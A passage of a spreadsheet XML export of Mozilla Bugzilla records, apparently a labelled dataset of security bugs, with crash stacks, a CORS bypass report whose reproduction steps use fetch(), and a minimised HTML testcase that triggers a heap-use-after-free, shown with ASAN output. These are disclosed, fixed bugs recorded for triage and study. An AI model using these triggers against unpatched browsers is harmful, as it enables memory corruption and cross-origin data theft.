2 	xul.dll 	mozilla::plugins::PluginModuleParent::NPP_NewInternal(char*, _NPP*, unsigned short, nsTArray&lt;nsCString&gt;&amp;, nsTArray&lt;nsCString&gt;&amp;, _NPSavedData*, short*) 	dom/plugins/ipc/PluginModuleParent.cpp
3 	xul.dll 	mozilla::plugins::PluginModuleParent::InitAsyncSurrogates() 	dom/plugins/ipc/PluginModuleParent.cpp
4 	xul.dll 	mozilla::plugins::PluginModuleParent::RecvNP_InitializeResult(short const&amp;) 	dom/plugins/ipc/PluginModuleParent.cpp
5 	xul.dll 	mozilla::plugins::PluginModuleChromeParent::RecvNP_InitializeResult(short const&amp;) 	dom/plugins/ipc/PluginModuleParent.cpp
6 	xul.dll 	mozilla::plugins::PPluginModuleParent::OnMessageReceived(IPC::Message const&amp;) 	obj-firefox/ipc/ipdl/PPluginModuleParent.cpp
7 	xul.dll 	mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) 	ipc/glue/MessageChannel.cpp
8 	xul.dll 	mozilla::ipc::MessageChannel::DispatchMessageW(IPC::Message const&amp;) 	ipc/glue/MessageChannel.cpp
9 	xul.dll 	mozilla::ipc::MessageChannel::OnMaybeDequeueOne() 	ipc/glue/MessageChannel.cpp
10 	xul.dll 	MessageLoop::DoWork() 	ipc/chromium/src/base/message_loop.cc
[...]
This is the #5 crash signature with 2% of all crashes in early 42.0 Beta 1 data. A lot of those crashes have a 0xffffffffe5e5e5e5 address (how do we get 64bit addresses on 32bit builds?) and as the lower 32bit of that match our (new) poison-on-free value, that smells like UAF and I'm cautiously marking it security for the moment.
Aaron, this sounds like Async Plugin Init would be involved, can you take a look?</t>
        </is>
      </c>
      <c r="X1955" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1956">
      <c r="A1956" t="n">
        <v>1645204</v>
      </c>
      <c r="B1956" t="inlineStr">
        <is>
          <t>2020-06-11 14:10:13 -0700</t>
        </is>
      </c>
      <c r="C1956" t="inlineStr">
        <is>
          <t>bypassCORSChecks is not cleared after a redirect</t>
        </is>
      </c>
      <c r="D1956" t="inlineStr">
        <is>
          <t>2021-04-07 04:53:06 -0700</t>
        </is>
      </c>
      <c r="E1956" t="n">
        <v>1</v>
      </c>
      <c r="F1956" t="n">
        <v>1</v>
      </c>
      <c r="G1956" t="n">
        <v>3</v>
      </c>
      <c r="H1956" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1956" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1956" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1956" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1956" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1956" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1956" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1956" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1956" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][sec-survey][adv-main79+][adv-ESR78.1+]</t>
        </is>
      </c>
      <c r="Q1956" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1956" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1956" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T1956" t="n">
        <v>1</v>
      </c>
      <c r="U1956" t="n">
        <v>0</v>
      </c>
      <c r="V1956" t="n">
        <v>35</v>
      </c>
      <c r="W1956" t="inlineStr">
        <is>
          <t>I came across the [`bypassCORSChecks` flag](https://searchfox.org/mozilla-central/rev/0e09b9191c02097034e46b193930f91c45b7885d/toolkit/components/extensions/webrequest/WebRequest.jsm#1001) and given its omnious name, I wondered whether the flag is unset when the channel is redirected. Apparently [it is not](https://searchfox.org/mozilla-central/rev/0e09b9191c02097034e46b193930f91c45b7885d/netwerk/protocol/http/nsCORSListenerProxy.cpp#516-521), and as a result, the response of the redirect can be read by any website!
By "response", I don't just mean the immediate response; if an attacker is able to change any URL in the redirect chain, then they can read data from any other website, with cookies if desired.
This flag is only used by extension code that handles redirects, so in order to be vulnerable to the bug, a user should install an extension that performs a redirect.
STR:
1. Install HTTPS Everywhere - https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
  (or the attached minimal extension, in case HTTPS Everywhere version 2020.5.20 becomes unavailable)
2. Visit example.com and open the developer tools
3. Run `await fetch("http://talkback-public.mozilla.org")`
  (or `http://live.com` if you want to see that the flag persists across server-side redirects).
Expected:
- Request should fail, because the remote resource doesn't respond with CORS headers:
  `Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at http://talkback-public.mozilla.org/. (Reason: CORS request did not succeed).`
Actual:
- Request succeeds, I am getting the response from https://crash-stats.mozilla.org/ because of this bug, triggered by the fact that HTTPS Everywhere has defined [a redirect rule from talkback-public.mozilla.org to crash-stats.mozilla.org](https://github.com/EFForg/https-everywhere/blob/d9324c41943b94bba3a821a3609a8cc1461632e1/src/chrome/content/rules/Mozilla.xml#L144-L145).
Regressed by bug 1450965. Fortunately this was in 69, so ESR68 is not affected. But the upcoming ESR78 will be affected unless this bug is fixed and uplifted. Since HTTPS Everywhere is installed by default in the Tor browser (based on ESR), this bug should be fixed ASAP.</t>
        </is>
      </c>
      <c r="X1956" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1957">
      <c r="A1957" t="n">
        <v>537705</v>
      </c>
      <c r="B1957" t="inlineStr">
        <is>
          <t>2010-01-04 07:37:45 -0800</t>
        </is>
      </c>
      <c r="C1957" t="inlineStr">
        <is>
          <t>Scroll-as-you-type</t>
        </is>
      </c>
      <c r="D1957" t="inlineStr">
        <is>
          <t>2010-01-04 17:25:35 -0800</t>
        </is>
      </c>
      <c r="E1957" t="n">
        <v>1</v>
      </c>
      <c r="F1957" t="n">
        <v>1</v>
      </c>
      <c r="G1957" t="n">
        <v>6</v>
      </c>
      <c r="H1957" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1957" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J1957" t="inlineStr">
        <is>
          <t>Editor</t>
        </is>
      </c>
      <c r="K1957" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1957" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1957" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N1957" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1957" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1957" t="inlineStr"/>
      <c r="Q1957" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1957" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1957" t="inlineStr">
        <is>
          <t>0.6</t>
        </is>
      </c>
      <c r="T1957" t="n">
        <v>1</v>
      </c>
      <c r="U1957" t="n">
        <v>0</v>
      </c>
      <c r="V1957" t="n">
        <v>2</v>
      </c>
      <c r="W1957" t="inlineStr">
        <is>
          <t>The rebooted editor does not yet scroll the view as you type.</t>
        </is>
      </c>
      <c r="X1957" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1958">
      <c r="A1958" t="n">
        <v>1531277</v>
      </c>
      <c r="B1958" t="inlineStr">
        <is>
          <t>2019-02-28 01:54:14 -0800</t>
        </is>
      </c>
      <c r="C1958" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsRefreshDriver::Tick (mozilla::SMILAnimationController)</t>
        </is>
      </c>
      <c r="D1958" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:04 -0700</t>
        </is>
      </c>
      <c r="E1958" t="n">
        <v>1</v>
      </c>
      <c r="F1958" t="n">
        <v>1</v>
      </c>
      <c r="G1958" t="n">
        <v>3</v>
      </c>
      <c r="H1958" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1958" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1958" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1958" t="inlineStr">
        <is>
          <t>67 Branch</t>
        </is>
      </c>
      <c r="L1958" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1958" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1958" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1958" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1958" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q1958" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1958" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1958" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T1958" t="n">
        <v>1</v>
      </c>
      <c r="U1958" t="n">
        <v>0</v>
      </c>
      <c r="V1958" t="n">
        <v>20</v>
      </c>
      <c r="W1958" t="inlineStr">
        <is>
          <t>Created attachment 9047319
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 67.0a1 (SourceStamp=198cd4a81bf2afa7cc79360f90da7bc91218b76d). It usually takes about 30 seconds to trigger.
crash.html
```
&lt;script&gt;
function start() {
	o13=document.documentElement;
	o209=document.createElement('div');
	o209.innerHTML='&lt;svg&gt;&lt;audio&gt;';
	o211=o209.firstChild.getElementsByTagName('*')[0];
	o234=document.createElement('div');
	o234.innerHTML='&lt;svg&gt;&lt;title&gt;';
	o241=o234.firstChild.getElementsByTagName('*')[0];
	o257=document.createElement('div');
	o257.innerHTML='&lt;svg&gt;&lt;font-face&gt;';
	o272=o257.firstChild.getElementsByTagName('*')[0];
	o392=window.document;
	o392.write('&lt;html&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;');
	o409=o392.head;
	o611=o392.createElement('style');
	o409.appendChild(o611);
	o611.textContent=':first-line{';
	o764=o241.ownerDocument;
	o765=o764.head;
	o771=document.createElement('style');
	o846=document.createElementNS('http://www.w3.org/2000/svg','animate');
	o13.appendChild(o846);
	o898=o272.ownerDocument;
	o898.close();
	o898.write('&lt;html&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;');
	o1109=document.createElement('div');
	o1109.innerHTML='&lt;svg&gt;';
	o898.close();
	o1121=o771.contentEditable=true;
	o1252=document.createElement('iframe');
	window.top.document.body.appendChild(o1252);
	o1387=document.documentElement;
	try{o898.appendChild(o898.replaceChild(o898.documentElement,o898.documentElement));}catch(e){}
	o1443=o1252.contentDocument;
	o1444=o1443.write(unescape('%0d'));
	o1443.appendChild(o13);
	o1387.appendChild(o211);
	o211.appendChild(o765);
	o13.appendChild(o771);
	o13.appendChild(o1109);
	window.top.setTimeout(fun0,4);
}
function fun0() {
	o898.appendChild(o1443.replaceChild(o898.documentElement,o1443.documentElement));
	for(var x=0;x&lt;1444;x++)eval("delete o" + x);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
```
ASAN output:
```
=================================================================
==26274==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110001eecc0 at pc 0x7f048f5cb63b bp 0x7ffde4ccbc30 sp 0x7ffde4ccbc28
READ of size 8 at 0x6110001eecc0 thread T0 (file:// Content)
    #0 0x7f048f5cb63a in AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:44:39
    #1 0x7f048f5cb63a in AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:361
    #2 0x7f048f5cb63a in RefPtr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:104
    #3 0x7f048f5cb63a in nsRefreshDriver::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1849
    #4 0x7f048f5dc0f9 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:342:13
    #5 0x7f048f5dc0f9 in mozilla::RefreshDriverTimer::TickRefreshDrivers(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:319
    #6 0x7f048f5db9e8 in mozilla::RefreshDriverTimer::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:5
    #7 0x7f048f5dfc2f in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:772:5
    #8 0x7f048f5dfc2f in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:692
    #9 0x7f048f5dedea in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::VsyncEvent const&amp;) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:592:9
    #10 0x7f04900c8925 in mozilla::layout::VsyncChild::RecvNotify(mozilla::VsyncEvent const&amp;) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:65:16
    #11 0x7f04867fd17b in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:168:54
    #12 0x7f04863c6477 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:2808:28
    #13 0x7f0485bee789 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2150:21
    #14 0x7f0485bea58a in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2077:9
    #15 0x7f0485bec791 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1936:3
    #16 0x7f0485bed557 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1967:13
    #17 0x7f048495e1d6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1162:14
    #18 0x7f048496607d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:474:10
    #19 0x7f0485bf7b8f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #20 0x7f0485adfe6e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7f0485adfe6e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7f0485adfe6e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7f048eee6473 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7f0493a86b2e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:908:20
    #25 0x7f0485adfe6e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7f0485adfe6e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7f0485adfe6e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7f0493a85c83 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:746:34
    #29 0x555a37a7e874 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:49:28
    #30 0x555a37a7e874 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:265
    #31 0x7f04a8a80b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x555a379a3efc in _start (/home/nils/browser/firefox/firefox/firefox+0x2defc)
0x6110001eecc0 is located 64 bytes inside of 200-byte region [0x6110001eec80,0x6110001eed48)
freed by thread T0 (file:// Content) here:
    #0 0x555a37a4ba22 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f048e666315 in mozilla::SMILAnimationController::Release() /builds/worker/workspace/build/src/dom/smil/SMILAnimationController.cpp:109:1
    #2 0x7f0488c2efb1 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:45:40
    #3 0x7f0488c2efb1 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:362
    #4 0x7f0488c2efb1 in ~RefPtr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:76
    #5 0x7f0488c2efb1 in mozilla::dom::Document::~Document() /builds/worker/workspace/build/src/dom/base/Document.cpp:1593
    #6 0x7f048ce27929 in ~nsHTMLDocument /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:186:36
    #7 0x7f048ce27929 in nsHTMLDocument::~nsHTMLDocument() /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:186
    #8 0x7f0484751cd8 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2428:29
    #9 0x7f0484751cd8 in SnowWhiteKiller::Visit(nsPurpleBuffer&amp;, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2457
    #10 0x7f0484726035 in void nsPurpleBuffer::VisitEntries&lt;SnowWhiteKiller&gt;(SnowWhiteKiller&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:941:23
    #11 0x7f0484727818 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2622:14
    #12 0x7f0486d62759 in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:142:9
    #13 0x7f0484981e72 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:319:22
    #14 0x7f048495e1d6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1162:14
    #15 0x7f048496607d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:474:10
    #16 0x7f0485bf7b8f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #17 0x7f0485adfe6e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #18 0x7f0485adfe6e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #19 0x7f0485adfe6e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #20 0x7f048eee6473 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #21 0x7f0493a86b2e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:908:20
    #22 0x7f0485adfe6e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #23 0x7f0485adfe6e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #24 0x7f0485adfe6e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #25 0x7f0493a85c83 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:746:34
    #26 0x555a37a7e874 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:49:28
    #27 0x555a37a7e874 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:265
    #28 0x7f04a8a80b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
previously allocated by thread T0 (file:// Content) here:
    #0 0x555a37a4bda3 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x555a37a8063d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7f0488c8b3da in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7f0488c8b3da in mozilla::dom::Document::GetAnimationController() /builds/worker/workspace/build/src/dom/base/Document.cpp:6102
    #4 0x7f048df03ea2 in mozilla::dom::SVGAnimationElement::BindToTree(mozilla::dom::Document*, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/svg/SVGAnimationElement.cpp:147:48
    #5 0x7f0488d00491 in mozilla::dom::Element::BindToTree(mozilla::dom::Document*, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/base/Element.cpp:1743:17
    #6 0x7f048cdf7417 in nsGenericHTMLElement::BindToTree(mozilla::dom::Document*, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:423:33
    #7 0x7f048cd6f9b3 in mozilla::dom::HTMLSharedElement::BindToTree(mozilla::dom::Document*, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/html/HTMLSharedElement.cpp:236:29
    #8 0x7f0489021209 in nsINode::InsertChildBefore(nsIContent*, nsIContent*, bool) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1269:23
    #9 0x7f048902cec7 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:2389:14
    #10 0x7f0489c65ba9 in InsertBefore /builds/worker/workspace/build/src/obj-firefox/dist/include/nsINode.h:1684:12
    #11 0x7f0489c65ba9 in AppendChild /builds/worker/workspace/build/src/obj-firefox/dist/include/nsINode.h:1687
    #12 0x7f0489c65ba9 in mozilla::dom::Node_Binding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:1021
    #13 0x7f048c09fd38 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3144:13
    #14 0x7f0493d67b97 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:13
    #15 0x7f0493d67b97 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:532
    #16 0x7f0493d6a152 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:603:8
    #17 0x7f0494a227b1 in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #18 0x7f04949db671 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:238:19
    #19 0x7f0494a00f50 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:501:19
    #20 0x7f0493d68be9 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:506:14
    #21 0x7f0493d4f9df in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:591:10
    #22 0x7f0493d4f9df in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3051
    #23 0x7f0493d32738 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:420:10
    #24 0x7f0493d68506 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:560:13
    #25 0x7f0493d6a152 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:603:8
    #26 0x7f049494b016 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2623:10
    #27 0x7f048b6a9d29 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #28 0x7f048c952e69 in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #29 0x7f048c9500f9 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205:12
    #30 0x7f048c902f3a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1042:51
    #31 0x7f048c905513 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1237:17
    #32 0x7f048c8e56b0 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:350:5
    #33 0x7f048c8e56b0 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:351
    #34 0x7f048c8e38d8 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:553:16
    #35 0x7f048c8ea523 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1044:11
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:44:39 in AddRef
Shadow bytes around the buggy address:
  0x0c2280035d40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280035d50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280035d60: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2280035d70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280035d80: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=&gt;0x0c2280035d90: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0c2280035da0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c2280035db0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2280035dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280035dd0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
